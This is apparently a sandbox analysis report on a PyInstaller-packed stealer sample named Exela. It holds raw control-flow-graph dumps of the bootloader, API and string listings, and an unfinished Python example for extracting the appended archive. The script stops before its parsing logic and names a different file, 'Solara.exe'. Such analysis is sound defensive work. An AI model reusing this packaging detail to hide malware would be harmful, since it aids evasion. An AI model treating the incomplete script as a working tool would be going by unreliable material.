7ff75aea4a73 18028 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 18027->18028 18032 7ff75aea4a9d 18028->18032 18029 7ff75aea4aaf 18065 7ff75aea2c80 18029->18065 18030->18027 18030->18029 18035 7ff75ae9c5c0 _log10_special 8 API calls 18032->18035 18033 7ff75aea4b8c 18034 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18033->18034 18034->18032 18036 7ff75ae929c3 18035->18036 18044 7ff75aea51d0 18036->18044 18038 7ff75aea4bb0 18038->18033 18042 7ff75aea4bba 18038->18042 18039 7ff75aea4b61 18040 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18039->18040 18040->18032 18041 7ff75aea4b58 18041->18033 18041->18039 18043 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18042->18043 18043->18032 18045 7ff75aeab338 _set_fmode 11 API calls 18044->18045 18046 7ff75aea51e7 18045->18046 18047 7ff75aeaec08 _set_fmode 11 API calls 18046->18047 18050 7ff75aea5227 18046->18050 18053 7ff75ae929e5 18046->18053 18048 7ff75aea521c 18047->18048 18049 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18048->18049 18049->18050 18050->18053 18200 7ff75aeaec90 
18050->18200 18053->17988 18054 7ff75aeaa970 _isindst 17 API calls 18055 7ff75aea526c 18054->18055 18057 7ff75ae9262f 18056->18057 18058 7ff75ae99400 2 API calls 18057->18058 18059 7ff75ae92660 18058->18059 18060 7ff75ae9266f MessageBoxW 18059->18060 18061 7ff75ae92683 MessageBoxA 18059->18061 18062 7ff75ae92690 18060->18062 18061->18062 18063 7ff75ae9c5c0 _log10_special 8 API calls 18062->18063 18064 7ff75ae926a0 18063->18064 18064->17992 18066 7ff75aea2cbe 18065->18066 18067 7ff75aea2cae 18065->18067 18068 7ff75aea2cf5 18066->18068 18069 7ff75aea2cc7 18066->18069 18070 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 18067->18070 18068->18067 18072 7ff75aea2ced 18068->18072 18073 7ff75aea4830 45 API calls 18068->18073 18075 7ff75aea2fa4 18068->18075 18079 7ff75aea3610 18068->18079 18105 7ff75aea32d8 18068->18105 18135 7ff75aea2b60 18068->18135 18071 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 18069->18071 18070->18072 18071->18072 18072->18033 18072->18038 18072->18039 18072->18041 18073->18068 18077 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 18075->18077 18077->18067 18080 7ff75aea3652 18079->18080 18081 7ff75aea36c5 18079->18081 18082 7ff75aea36ef 18080->18082 18083 7ff75aea3658 18080->18083 18084 7ff75aea371f 18081->18084 18085 7ff75aea36ca 18081->18085 18152 7ff75aea1bc0 18082->18152 18092 7ff75aea365d 18083->18092 18096 7ff75aea372e 18083->18096 18084->18082 18084->18096 18103 7ff75aea3688 18084->18103 18086 7ff75aea36ff 18085->18086 18087 7ff75aea36cc 18085->18087 18159 7ff75aea17b0 18086->18159 18089 7ff75aea366d 18087->18089 18095 7ff75aea36db 18087->18095 18104 7ff75aea375d 18089->18104 18138 7ff75aea3f74 18089->18138 18092->18089 18094 7ff75aea36a0 18092->18094 18092->18103 18094->18104 18148 7ff75aea4430 18094->18148 18095->18082 18098 7ff75aea36e0 18095->18098 18096->18104 18166 7ff75aea1fd0 18096->18166 18100 7ff75aea45c8 37 API calls 18098->18100 18098->18104 18099 7ff75ae9c5c0 _log10_special 8 API calls 18101 7ff75aea39f3 
18099->18101 18100->18103 18101->18068 18103->18104 18173 7ff75aeae8c8 18103->18173 18104->18099 18106 7ff75aea32e3 18105->18106 18107 7ff75aea32f9 18105->18107 18108 7ff75aea3652 18106->18108 18109 7ff75aea36c5 18106->18109 18111 7ff75aea3337 18106->18111 18110 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 18107->18110 18107->18111 18112 7ff75aea36ef 18108->18112 18113 7ff75aea3658 18108->18113 18114 7ff75aea371f 18109->18114 18115 7ff75aea36ca 18109->18115 18110->18111 18111->18068 18118 7ff75aea1bc0 38 API calls 18112->18118 18122 7ff75aea365d 18113->18122 18126 7ff75aea372e 18113->18126 18114->18112 18114->18126 18133 7ff75aea3688 18114->18133 18116 7ff75aea36ff 18115->18116 18117 7ff75aea36cc 18115->18117 18120 7ff75aea17b0 38 API calls 18116->18120 18119 7ff75aea366d 18117->18119 18124 7ff75aea36db 18117->18124 18118->18133 18121 7ff75aea3f74 47 API calls 18119->18121 18134 7ff75aea375d 18119->18134 18120->18133 18121->18133 18122->18119 18125 7ff75aea36a0 18122->18125 18122->18133 18123 7ff75aea1fd0 38 API calls 18123->18133 18124->18112 18128 7ff75aea36e0 18124->18128 18127 7ff75aea4430 47 API calls 18125->18127 18125->18134 18126->18123 18126->18134 18127->18133 18130 7ff75aea45c8 37 API calls 18128->18130 18128->18134 18129 7ff75ae9c5c0 _log10_special 8 API calls 18131 7ff75aea39f3 18129->18131 18130->18133 18131->18068 18132 7ff75aeae8c8 47 API calls 18132->18133 18133->18132 18133->18134 18134->18129 18183 7ff75aea0d84 18135->18183 18139 7ff75aea3f96 18138->18139 18140 7ff75aea0bf0 12 API calls 18139->18140 18141 7ff75aea3fde 18140->18141 18142 7ff75aeae5e0 46 API calls 18141->18142 18144 7ff75aea40b1 18142->18144 18143 7ff75aea40d3 18146 7ff75aea4830 45 API calls 18143->18146 18147 7ff75aea415c 18143->18147 18144->18143 18145 7ff75aea4830 45 API calls 18144->18145 18145->18143 18146->18147 18147->18103 18149 7ff75aea4448 18148->18149 18151 7ff75aea44b0 18148->18151 18150 7ff75aeae8c8 47 API calls 18149->18150 18149->18151 18150->18151 
18151->18103 18153 7ff75aea1bf3 18152->18153 18154 7ff75aea1c22 18153->18154 18156 7ff75aea1cdf 18153->18156 18155 7ff75aea0bf0 12 API calls 18154->18155 18158 7ff75aea1c5f 18154->18158 18155->18158 18157 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 18156->18157 18157->18158 18158->18103 18161 7ff75aea17e3 18159->18161 18160 7ff75aea1812 18162 7ff75aea0bf0 12 API calls 18160->18162 18165 7ff75aea184f 18160->18165 18161->18160 18163 7ff75aea18cf 18161->18163 18162->18165 18164 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 18163->18164 18164->18165 18165->18103 18167 7ff75aea2003 18166->18167 18168 7ff75aea2032 18167->18168 18170 7ff75aea20ef 18167->18170 18169 7ff75aea0bf0 12 API calls 18168->18169 18172 7ff75aea206f 18168->18172 18169->18172 18171 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 18170->18171 18171->18172 18172->18103 18174 7ff75aeae8f0 18173->18174 18175 7ff75aeae935 18174->18175 18176 7ff75aea4830 45 API calls 18174->18176 18179 7ff75aeae8f5 memcpy_s 18174->18179 18182 7ff75aeae91e memcpy_s 18174->18182 18178 7ff75aeb0858 WideCharToMultiByte 18175->18178 18175->18179 18175->18182 18176->18175 18177 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 18177->18179 18180 7ff75aeaea11 18178->18180 18179->18103 18180->18179 18181 7ff75aeaea26 GetLastError 18180->18181 18181->18179 18181->18182 18182->18177 18182->18179 18184 7ff75aea0db1 18183->18184 18185 7ff75aea0dc3 18183->18185 18186 7ff75aea4f78 _set_fmode 11 API calls 18184->18186 18188 7ff75aea0dd0 18185->18188 18191 7ff75aea0e0d 18185->18191 18187 7ff75aea0db6 18186->18187 18189 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 18187->18189 18190 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 18188->18190 18196 7ff75aea0dc1 18189->18196 18190->18196 18192 7ff75aea0eb6 18191->18192 18194 7ff75aea4f78 _set_fmode 11 API calls 18191->18194 18193 7ff75aea4f78 _set_fmode 11 API calls 18192->18193 18192->18196 18195 7ff75aea0f60 18193->18195 18197 7ff75aea0eab 18194->18197 18199 
7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 18195->18199 18196->18068 18198 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 18197->18198 18198->18192 18199->18196 18203 7ff75aeaecad 18200->18203 18201 7ff75aeaecb2 18202 7ff75aea4f78 _set_fmode 11 API calls 18201->18202 18205 7ff75aea524d 18201->18205 18208 7ff75aeaecbc 18202->18208 18203->18201 18203->18205 18206 7ff75aeaecfc 18203->18206 18204 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 18204->18205 18205->18053 18205->18054 18206->18205 18207 7ff75aea4f78 _set_fmode 11 API calls 18206->18207 18207->18208 18208->18204 18210 7ff75aea82b5 18209->18210 18211 7ff75aea82c8 18209->18211 18212 7ff75aea4f78 _set_fmode 11 API calls 18210->18212 18219 7ff75aea7f2c 18211->18219 18214 7ff75aea82ba 18212->18214 18216 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 18214->18216 18217 7ff75aea82c6 18216->18217 18217->17374 18226 7ff75aeb0348 EnterCriticalSection 18219->18226 18228 7ff75ae987a1 GetTokenInformation 18227->18228 18229 7ff75ae98823 __std_exception_destroy 18227->18229 18230 7ff75ae987c2 GetLastError 18228->18230 18233 7ff75ae987cd 18228->18233 18231 7ff75ae98836 CloseHandle 18229->18231 18232 7ff75ae9883c 18229->18232 18230->18229 18230->18233 18231->18232 18232->17379 18233->18229 18234 7ff75ae987e9 GetTokenInformation 18233->18234 18234->18229 18235 7ff75ae9880c 18234->18235 18235->18229 18236 7ff75ae98816 ConvertSidToStringSidW 18235->18236 18236->18229 18238 7ff75ae9c8c0 18237->18238 18239 7ff75ae92b74 GetCurrentProcessId 18238->18239 18240 7ff75ae926b0 48 API calls 18239->18240 18241 7ff75ae92bc7 18240->18241 18242 7ff75aea4c48 48 API calls 18241->18242 18243 7ff75ae92c10 MessageBoxW 18242->18243 18244 7ff75ae9c5c0 _log10_special 8 API calls 18243->18244 18245 7ff75ae92c40 18244->18245 18245->17389 18247 7ff75ae925e5 18246->18247 18248 7ff75aea4c48 48 API calls 18247->18248 18249 7ff75ae92604 18248->18249 18249->17405 18285 7ff75aea8804 18250->18285 18254 7ff75ae981cc 18253->18254 18255 
7ff75ae99400 2 API calls 18254->18255 18256 7ff75ae981eb 18255->18256 18257 7ff75ae981f3 18256->18257 18258 7ff75ae98206 ExpandEnvironmentStringsW 18256->18258 18260 7ff75ae92810 49 API calls 18257->18260 18259 7ff75ae9822c __std_exception_destroy 18258->18259 18262 7ff75ae98230 18259->18262 18263 7ff75ae98243 18259->18263 18261 7ff75ae981ff __std_exception_destroy 18260->18261 18326 7ff75aeb15c8 18285->18326 18385 7ff75aeb1340 18326->18385 18406 7ff75aeb0348 EnterCriticalSection 18385->18406 18416 7ff75ae9455a 18415->18416 18417 7ff75ae99400 2 API calls 18416->18417 18418 7ff75ae9457f 18417->18418 18419 7ff75ae9c5c0 _log10_special 8 API calls 18418->18419 18420 7ff75ae945a7 18419->18420 18420->17442 18422 7ff75ae97e1e 18421->18422 18423 7ff75ae91c80 49 API calls 18422->18423 18424 7ff75ae97f42 18422->18424 18429 7ff75ae97ea5 18423->18429 18425 7ff75ae9c5c0 _log10_special 8 API calls 18424->18425 18426 7ff75ae97f73 18425->18426 18426->17442 18427 7ff75ae91c80 49 API calls 18427->18429 18428 7ff75ae94550 10 API calls 18428->18429 18429->18424 18429->18427 18429->18428 18430 7ff75ae99400 2 API calls 18429->18430 18431 7ff75ae97f13 CreateDirectoryW 18430->18431 18431->18424 18431->18429 18433 7ff75ae91613 18432->18433 18434 7ff75ae91637 18432->18434 18553 7ff75ae91050 18433->18553 18435 7ff75ae945b0 108 API calls 18434->18435 18437 7ff75ae9164b 18435->18437 18440 7ff75ae91682 18437->18440 18441 7ff75ae91653 18437->18441 18438 7ff75ae91618 18439 7ff75ae9162e 18438->18439 18442 7ff75ae92710 54 API calls 18438->18442 18439->17442 18444 7ff75ae945b0 108 API calls 18440->18444 18443 7ff75aea4f78 _set_fmode 11 API calls 18441->18443 18442->18439 18445 7ff75ae91658 18443->18445 18446 7ff75ae91696 18444->18446 18447 7ff75ae92910 54 API calls 18445->18447 18448 7ff75ae916b8 18446->18448 18449 7ff75ae9169e 18446->18449 18451 7ff75ae91671 18447->18451 18450 7ff75aea0744 73 API calls 18448->18450 18452 7ff75ae92710 54 API calls 18449->18452 18454 7ff75ae916cd 18450->18454 
18451->17442 18453 7ff75ae916ae 18452->18453 18481 7ff75ae9717b 18480->18481 18483 7ff75ae97134 18480->18483 18481->17442 18483->18481 18617 7ff75aea5094 18483->18617 18485 7ff75ae94191 18484->18485 18486 7ff75ae944d0 49 API calls 18485->18486 18487 7ff75ae941cb 18486->18487 18488 7ff75ae944d0 49 API calls 18487->18488 18489 7ff75ae941db 18488->18489 18490 7ff75ae9422c 18489->18490 18491 7ff75ae941fd 18489->18491 18493 7ff75ae94100 51 API calls 18490->18493 18632 7ff75ae94100 18491->18632 18494 7ff75ae9422a 18493->18494 18495 7ff75ae94257 18494->18495 18496 7ff75ae9428c 18494->18496 18497 7ff75ae94100 51 API calls 18496->18497 18529 7ff75ae91c80 49 API calls 18528->18529 18530 7ff75ae94464 18529->18530 18530->17442 18554 7ff75ae945b0 108 API calls 18553->18554 18555 7ff75ae9108c 18554->18555 18556 7ff75ae91094 18555->18556 18557 7ff75ae910a9 18555->18557 18558 7ff75ae92710 54 API calls 18556->18558 18559 7ff75aea0744 73 API calls 18557->18559 18564 7ff75ae910a4 __std_exception_destroy 18558->18564 18560 7ff75ae910bf 18559->18560 18561 7ff75ae910c3 18560->18561 18562 7ff75ae910e6 18560->18562 18563 7ff75aea4f78 _set_fmode 11 API calls 18561->18563 18566 7ff75ae91122 18562->18566 18567 7ff75ae910f7 18562->18567 18565 7ff75ae910c8 18563->18565 18564->18438 18570 7ff75ae91129 18566->18570 18571 7ff75ae9113c 18566->18571 18569 7ff75aea4f78 _set_fmode 11 API calls 18567->18569 18618 7ff75aea50a1 18617->18618 18619 7ff75aea50ce 18617->18619 18621 7ff75aea4f78 _set_fmode 11 API calls 18618->18621 18629 7ff75aea5058 18618->18629 18620 7ff75aea50f1 18619->18620 18623 7ff75aea510d 18619->18623 18622 7ff75aea4f78 _set_fmode 11 API calls 18620->18622 18624 7ff75aea50ab 18621->18624 18626 7ff75aea50f6 18622->18626 18627 7ff75aea4fbc 45 API calls 18623->18627 18625 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 18624->18625 18628 7ff75aea50b6 18625->18628 18630 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 18626->18630 18631 7ff75aea5101 18627->18631 18628->18483 
18629->18483 18630->18631 18631->18483 18633 7ff75ae94126 18632->18633 18634 7ff75aea49f4 49 API calls 18633->18634 18635 7ff75ae9414c 18634->18635 18696 7ff75aea5f38 18695->18696 18697 7ff75aea5f5e 18696->18697 18699 7ff75aea5f91 18696->18699 18698 7ff75aea4f78 _set_fmode 11 API calls 18697->18698 18700 7ff75aea5f63 18698->18700 18701 7ff75aea5fa4 18699->18701 18702 7ff75aea5f97 18699->18702 18703 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 18700->18703 18714 7ff75aeaac98 18701->18714 18704 7ff75aea4f78 _set_fmode 11 API calls 18702->18704 18706 7ff75ae94606 18703->18706 18704->18706 18706->17467 18727 7ff75aeb0348 EnterCriticalSection 18714->18727 19087 7ff75aea7968 19086->19087 19090 7ff75aea7444 19087->19090 19089 7ff75aea7981 19089->17477 19091 7ff75aea745f 19090->19091 19092 7ff75aea748e 19090->19092 19094 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 19091->19094 19100 7ff75aea54dc EnterCriticalSection 19092->19100 19096 7ff75aea747f 19094->19096 19096->19089 19102 7ff75ae9fee1 19101->19102 19103 7ff75ae9feb3 19101->19103 19106 7ff75ae9fed3 19102->19106 19111 7ff75aea54dc EnterCriticalSection 19102->19111 19104 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 19103->19104 19104->19106 19106->17481 19113 7ff75ae945b0 108 API calls 19112->19113 19114 7ff75ae91493 19113->19114 19115 7ff75ae9149b 19114->19115 19116 7ff75ae914bc 19114->19116 19117 7ff75ae92710 54 API calls 19115->19117 19118 7ff75aea0744 73 API calls 19116->19118 19119 7ff75ae914ab 19117->19119 19120 7ff75ae914d1 19118->19120 19119->17507 19121 7ff75ae914d5 19120->19121 19124 7ff75ae914f8 19120->19124 19219 7ff75ae96365 19218->19219 19220 7ff75ae91c80 49 API calls 19219->19220 19221 7ff75ae963a1 19220->19221 19222 7ff75ae963aa 19221->19222 19223 7ff75ae963cd 19221->19223 19224 7ff75ae92710 54 API calls 19222->19224 19225 7ff75ae94620 49 API calls 19223->19225 19241 7ff75ae963c3 19224->19241 19226 7ff75ae963e5 19225->19226 19227 7ff75ae96403 19226->19227 19228 7ff75ae92710 54 API 
calls 19226->19228 19229 7ff75ae94550 10 API calls 19227->19229 19228->19227 19231 7ff75ae9640d 19229->19231 19230 7ff75ae9c5c0 _log10_special 8 API calls 19232 7ff75ae9336e 19230->19232 19232->17581 19249 7ff75ae964f0 19232->19249 19241->19230 19398 7ff75ae953f0 19249->19398 19932 7ff75aeb1720 19943 7ff75aeb7454 19932->19943 19945 7ff75aeb7461 19943->19945 19944 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19944->19945 19945->19944 19946 7ff75aeb747d 19945->19946 19947 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19946->19947 19948 7ff75aeb1729 19946->19948 19947->19946 19949 7ff75aeb0348 EnterCriticalSection 19948->19949 16143 7ff75aea5698 16144 7ff75aea56cf 16143->16144 16145 7ff75aea56b2 16143->16145 16144->16145 16147 7ff75aea56e2 CreateFileW 16144->16147 16194 7ff75aea4f58 16145->16194 16149 7ff75aea5716 16147->16149 16150 7ff75aea574c 16147->16150 16168 7ff75aea57ec GetFileType 16149->16168 16197 7ff75aea5c74 16150->16197 16152 7ff75aea4f78 _set_fmode 11 API calls 16155 7ff75aea56bf 16152->16155 16159 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 16155->16159 16157 7ff75aea5780 16223 7ff75aea5a34 16157->16223 16158 7ff75aea5755 16218 7ff75aea4eec 16158->16218 16163 7ff75aea56ca 16159->16163 16160 7ff75aea5741 CloseHandle 16160->16163 16161 7ff75aea572b CloseHandle 16161->16163 16167 7ff75aea575f 16167->16163 16169 7ff75aea58f7 16168->16169 16170 7ff75aea583a 16168->16170 16172 7ff75aea58ff 16169->16172 16173 7ff75aea5921 16169->16173 16171 7ff75aea5866 GetFileInformationByHandle 16170->16171 16174 7ff75aea5b70 21 API calls 16170->16174 16175 7ff75aea588f 16171->16175 16176 7ff75aea5912 GetLastError 16171->16176 16172->16176 16177 7ff75aea5903 16172->16177 16178 7ff75aea5944 PeekNamedPipe 16173->16178 16193 7ff75aea58e2 16173->16193 16179 7ff75aea5854 16174->16179 16180 7ff75aea5a34 51 API calls 16175->16180 16182 7ff75aea4eec _fread_nolock 11 API calls 16176->16182 16181 7ff75aea4f78 
_set_fmode 11 API calls 16177->16181 16178->16193 16179->16171 16179->16193 16184 7ff75aea589a 16180->16184 16181->16193 16182->16193 16183 7ff75ae9c5c0 _log10_special 8 API calls 16185 7ff75aea5724 16183->16185 16240 7ff75aea5994 16184->16240 16185->16160 16185->16161 16188 7ff75aea5994 10 API calls 16189 7ff75aea58b9 16188->16189 16190 7ff75aea5994 10 API calls 16189->16190 16191 7ff75aea58ca 16190->16191 16192 7ff75aea4f78 _set_fmode 11 API calls 16191->16192 16191->16193 16192->16193 16193->16183 16195 7ff75aeab338 _set_fmode 11 API calls 16194->16195 16196 7ff75aea4f61 16195->16196 16196->16152 16198 7ff75aea5caa 16197->16198 16199 7ff75aea4f78 _set_fmode 11 API calls 16198->16199 16217 7ff75aea5d42 __std_exception_destroy 16198->16217 16201 7ff75aea5cbc 16199->16201 16200 7ff75ae9c5c0 _log10_special 8 API calls 16202 7ff75aea5751 16200->16202 16203 7ff75aea4f78 _set_fmode 11 API calls 16201->16203 16202->16157 16202->16158 16204 7ff75aea5cc4 16203->16204 16247 7ff75aea7e78 16204->16247 16206 7ff75aea5cd9 16207 7ff75aea5ce1 16206->16207 16208 7ff75aea5ceb 16206->16208 16209 7ff75aea4f78 _set_fmode 11 API calls 16207->16209 16210 7ff75aea4f78 _set_fmode 11 API calls 16208->16210 16213 7ff75aea5ce6 16209->16213 16211 7ff75aea5cf0 16210->16211 16212 7ff75aea4f78 _set_fmode 11 API calls 16211->16212 16211->16217 16214 7ff75aea5cfa 16212->16214 16215 7ff75aea5d34 GetDriveTypeW 16213->16215 16213->16217 16216 7ff75aea7e78 45 API calls 16214->16216 16215->16217 16216->16213 16217->16200 16219 7ff75aeab338 _set_fmode 11 API calls 16218->16219 16220 7ff75aea4ef9 Concurrency::details::SchedulerProxy::DeleteThis 16219->16220 16221 7ff75aeab338 _set_fmode 11 API calls 16220->16221 16222 7ff75aea4f1b 16221->16222 16222->16167 16225 7ff75aea5a5c 16223->16225 16224 7ff75aea578d 16233 7ff75aea5b70 16224->16233 16225->16224 16341 7ff75aeaf794 16225->16341 16227 7ff75aea5af0 16227->16224 16228 7ff75aeaf794 51 API calls 16227->16228 16229 7ff75aea5b03 16228->16229 16229->16224 
                                                                                                    • (Remainder of the control-flow graph begun above, rendered as a graph in the original report. The nodes in this part call FileTimeToSystemTime, SystemTimeToTzSpecificLocalTime, GetFullPathNameW, GetLastError, GetDriveTypeW, GetCurrentDirectoryW and EnterCriticalSection, plus the CRT routines _fread_nolock, _set_fmode, _invalid_parameter_noinfo, __std_exception_destroy, memcpy_s, __CxxCallCatchBlock, _log10_special and Concurrency::details::SchedulerProxy::DeleteThis.)

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    • Graph (rendered in the original report) for the function at 7ff75ae98bd0-7ff75ae9904f. Its entry block calls SetConsoleCtrlHandler, GetStartupInfoW, GetCommandLineW and CreateProcessW; the success path continues with RegisterClassW, CreateWindowExW and ShowWindow, then loops over WaitForSingleObject, MsgWaitForMultipleObjects, PeekMessageW, GetMessageW, TranslateMessage and DispatchMessageW (timed with QueryPerformanceFrequency and QueryPerformanceCounter), with one branch calling TerminateProcess and waiting on the child again; the exit path runs DestroyWindow, GetExitCodeProcess and CloseHandle twice. GetLastError is read after CreateProcessW, RegisterClassW, CreateWindowExW and TerminateProcess. Internal calls: 7ff75ae9c8c0, 7ff75ae99400, 7ff75aea5460, 7ff75aeaa4ec, 7ff75aea878c, 7ff75ae92c50 and 7ff75ae9c5c0.
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                    • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                    • API String ID: 3832162212-3165540532
                                                                                                    • Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                    • Instruction ID: 1ab73469522d9df8703f70ce5660bd6f590d1f319819d037a5ddd785809d90c5
                                                                                                    • Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                    • Instruction Fuzzy Hash: 44D1E432A08B968AF710BF34E85A6ADB764FF84B58F884275DA5D43AA4DF3CD504C710

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    • Graph (rendered in the original report) for the function at 7ff75ae91000-7ff75ae94060. The only Windows APIs called directly are SetDllDirectoryW, LoadLibraryExW, PostMessageW and GetMessageW; every other block calls into the module's own routines, among them 7ff75ae98bd0 (the hidden-window function above), 7ff75ae98a20, 7ff75ae91c80, 7ff75ae98b30, 7ff75ae98b90, 7ff75aea4fa0, 7ff75aea52c0, 7ff75ae96fb0, 7ff75ae96d60, 7ff75ae96db0, 7ff75ae97330, 7ff75ae971a0, 7ff75ae974e0 and 7ff75ae99200. Many failure branches converge on 7ff75ae92710 before the common exit block at 7ff75ae93c97 (call 7ff75ae9c5c0). The strings listed under Similarity are the messages and environment variable names used along these paths.
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastModuleName
                                                                                                    • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
                                                                                                    • API String ID: 2776309574-4232158417
                                                                                                    • Opcode ID: 230e5f2fbe18b706386c2e6c5de042c78cdf1bdf29ac743ce162c0a9040f007d
                                                                                                    • Instruction ID: b69eaa1dd3331475563e73e66bf5e4f1996367c321b0537a7c0a8e22d49e240b
                                                                                                    • Opcode Fuzzy Hash: 230e5f2fbe18b706386c2e6c5de042c78cdf1bdf29ac743ce162c0a9040f007d
                                                                                                    • Instruction Fuzzy Hash: F932AF21A0C7A759FA24B720945A7F9E691AF44B84FCC41B6DA5D432D2EF3CE954C330
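The strings of this function (the embedded PKG archive, the "MEI" cookie, pyi-runtime-tmpdir, pyi-disable-windowed-traceback, the _PYI_* environment variables) and the "PyInstaller Onefile Hidden Window" parent in the previous function are the PyInstaller onefile bootloader at work: the Python payload of the stealer is not in the PE sections but in a CArchive appended to the executable and located through a trailing cookie. The following is an added example, not code from Joe Sandbox, PyInstaller or the sample: it finds that cookie, walks the table of contents and pulls out an entry, so the startup script can be recovered for analysis. The cookie and TOC layouts follow PyInstaller's archive writer for versions 2.1 and later; the packed file it parses by default is constructed inline and is not Solara.exe.

```python
"""List the PyInstaller onefile PKG archive (CArchive) appended to an executable.
Added example for the report above, not Joe Sandbox or PyInstaller code; the
layouts follow PyInstaller's writer (2.1+), the default input is constructed.
"""
import struct, sys, zlib
from dataclasses import dataclass
from typing import List

MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"         # cookie magic: the "MEI" string seen in the bootloader
COOKIE_FMT = "!8sIIii64s"                  # magic, pkg length, TOC offset, TOC length, py version, pylib
COOKIE_SIZE = struct.calcsize(COOKIE_FMT)  # 88 bytes, the tail of the archive
ENTRY_FMT = "!iIIIBB"                      # entry length, data offset, packed len, raw len, zlib flag, type
ENTRY_SIZE = struct.calcsize(ENTRY_FMT)    # 18 bytes, followed by the NUL-padded entry name
TYPECODES = {"s": "startup script", "z": "PYZ archive", "Z": "PYZ archive", "m": "module",
             "M": "package", "b": "binary", "x": "data", "o": "runtime option", "d": "dependency"}


@dataclass
class TocEntry:
    name: str
    typecode: str
    offset: int          # relative to the archive start
    packed_len: int
    raw_len: int
    compressed: bool


@dataclass
class Archive:
    start: int           # file offset of the archive; the bootloader stub precedes it
    python_version: int
    python_lib: str
    entries: List[TocEntry]


def python_version_tuple(pyver: int):
    """Newer bootloaders store major*100+minor (311); older ones major*10+minor (37)."""
    return divmod(pyver, 100) if pyver >= 100 else divmod(pyver, 10)


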